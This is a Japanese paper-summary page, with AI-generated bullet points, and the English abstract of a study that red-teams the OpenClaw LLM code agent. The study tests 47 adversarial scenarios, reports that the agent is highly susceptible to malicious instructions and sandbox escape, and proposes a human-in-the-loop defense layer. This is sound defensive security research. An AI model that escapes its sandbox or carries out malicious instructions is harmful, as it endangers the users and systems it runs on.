AIDB Daily Papers
OpenClawのセキュリティ分析と防御フレームワーク:LLM駆動型コードエージェントのリスク
※ 日本語タイトル・ポイントはAIによる自動生成です。正確な内容は原論文をご確認ください。
ポイント
- 本研究では、LLMを活用したコードエージェントOpenClawのセキュリティ脆弱性を分析し、防御フレームワークを提案した。
- OpenClawはセキュリティ制約が少ないため、悪意ある命令に脆弱であり、Human-in-the-Loopによる防御が重要となる。
- HITL層の導入により、OpenClawの防御率は19%から92%に向上し、人間とエージェントの協調防御の有効性を示した。
Abstract
Code agents powered by large language models can execute shell commands on behalf of users, introducing severe security vulnerabilities. This paper presents a two-phase security analysis of the OpenClaw platform. As an open-source AI agent framework that operates locally, OpenClaw can be integrated with various commercial large language models. Because its native architecture lacks built-in security constraints, it serves as an ideal subject for evaluating baseline agent vulnerabilities. First, we systematically evaluate OpenClaw's native resilience against malicious instructions. By testing 47 adversarial scenarios across six major attack categories derived from the MITRE ATLAS and ATT&CK frameworks, we have demonstrated that OpenClaw exhibits significant inherent security issues. It primarily relies on the security capabilities of the backend LLM and is highly susceptible to sandbox escape attacks, with an average defense rate of only 17%. To mitigate these critical security gaps, we propose and implement a novel Human-in-the-Loop (HITL) defense layer. We utilize a dual-mode testing framework to evaluate the system with and without our proposed intervention. Our findings show that the introduced HITL layer significantly hardens the system, successfully intercepting up to 8 severe attacks that completely bypassed OpenClaw's native defenses. By combining native capabilities with our HITL approach, the overall defense rate improves to a range of 19% to 92%. Our study not only exposes the intrinsic limitations of current code agents but also demonstrates the effectiveness of human-agent collaborative defense strategies.
Paper AI Chat
この論文のPDF全文を対象にAIに質問できます。
質問の例: